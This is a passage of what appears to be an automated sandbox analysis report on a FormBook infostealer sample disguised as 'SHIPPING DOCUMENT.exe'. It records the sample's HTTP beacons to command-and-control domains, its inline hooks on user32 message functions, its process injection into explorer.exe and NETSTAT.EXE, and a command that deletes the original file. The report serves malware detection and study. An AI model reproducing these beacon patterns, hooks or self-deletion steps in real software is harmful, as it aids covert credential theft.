                                          Data Ascii: <!DOCTYPE html><html><head><meta charset="GBK"><title>||||||||</title>...[if IE 8]><style>.ie8 .alert-circle,.ie8 .alert-footer{display:none}.ie8 .alert-box{padding-top:75px}.ie8 .alert-sec-text{top:45px}</style><![endif]--><style>body{margin:0;padding:0;background:#E6EAEB;font-family:Arial,'','',sans-serif}.alert-box{display:none;position:relative;margin:96px auto 0;padding:180px 85px 22px;border-radius:10px 10px 0 0;background:#FFF;box-shadow:5px 9px 17px rgba(102,102,102,0.75);width:286px;color:#FFF;text-align:center}.alert-box p{margin:0}.alert-circle{position:absolute;top:-50px;left:111px}.alert-sec-circle{stroke-dashoffset:0;stroke-dasharray:735;transition:stroke-dashoffset 1s linear}.alert-sec-text{position:absolute;top:11px;left:190px;width:76px;color:#000;font-size:68px}.alert-sec-unit{font-size:34px}.alert-body{margin:35px 0}.alert-head{color:#242424;font-size:28px}.alert-concent{margin:25px 0 14px;color:#7B7B7B;font-size:18px}.alert-concent p{line-height:27px}.alert-btn{display:block;border-radius:10px;background-color:#4AB0F7;height:55px;line-height:55px;width:286px;color:#FFF;font-size:20px;text-decorat


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44976234.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:11:56.367537022 CEST6379OUTGET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.buyruon.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:11:56.504621983 CEST6380INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Tue, 04 May 2021 18:11:56 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6089be8c-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.44976564.190.62.11180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:12:16.816143990 CEST6409OUTGET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.fuerzaagavera.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:12:16.892096996 CEST6410INHTTP/1.1 302 Found
                                          date: Tue, 04 May 2021 18:12:16 GMT
                                          content-type: text/html; charset=UTF-8
                                          content-length: 0
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EROzPbOnbfRvUmSbAOkEUwJ7s553pIun9G63+qZ5vnIypGjvdj+l8kui4EOI3lWVG2yScLUXKcmIyMA5hPxUDw==
                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          pragma: no-cache
                                          last-modified: Tue, 04 May 2021 18:12:16 GMT
                                          location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                          x-cache-miss-from: parking-5cc4cbb56f-gtxcr
                                          server: NginX
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.449766154.220.41.20880C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          May 4, 2021 20:12:37.590909004 CEST6412OUTGET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1
                                          Host: www.union-green.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          May 4, 2021 20:12:37.898349047 CEST6412INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Tue, 04 May 2021 18:12:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 1.0


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE6
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE6

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: SHIPPING DOCUMENT.exe PID: 7060 Parent PID: 6000

                                          General

                                          Start time:20:10:33
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: SHIPPING DOCUMENT.exe PID: 7088 Parent PID: 7060

                                          General

                                          Start time:20:10:34
                                          Start date:04/05/2021
                                          Path:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x400000
                                          File size:233957 bytes
                                          MD5 hash:25E847B9631BC2FE8D87FE4278FA142E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 7088

                                          General

                                          Start time:20:10:39
                                          Start date:04/05/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: autofmt.exe PID: 5756 Parent PID: 3424

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0x8e0000
                                          File size:831488 bytes
                                          MD5 hash:7FC345F685C2A58283872D851316ACC4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Analysis Process: NETSTAT.EXE PID: 5752 Parent PID: 3424

                                          General

                                          Start time:20:10:54
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Imagebase:0xd60000
                                          File size:32768 bytes
                                          MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Analysis Process: cmd.exe PID: 6948 Parent PID: 5752

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: conhost.exe PID: 6664 Parent PID: 6948

                                          General

                                          Start time:20:10:58
                                          Start date:04/05/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >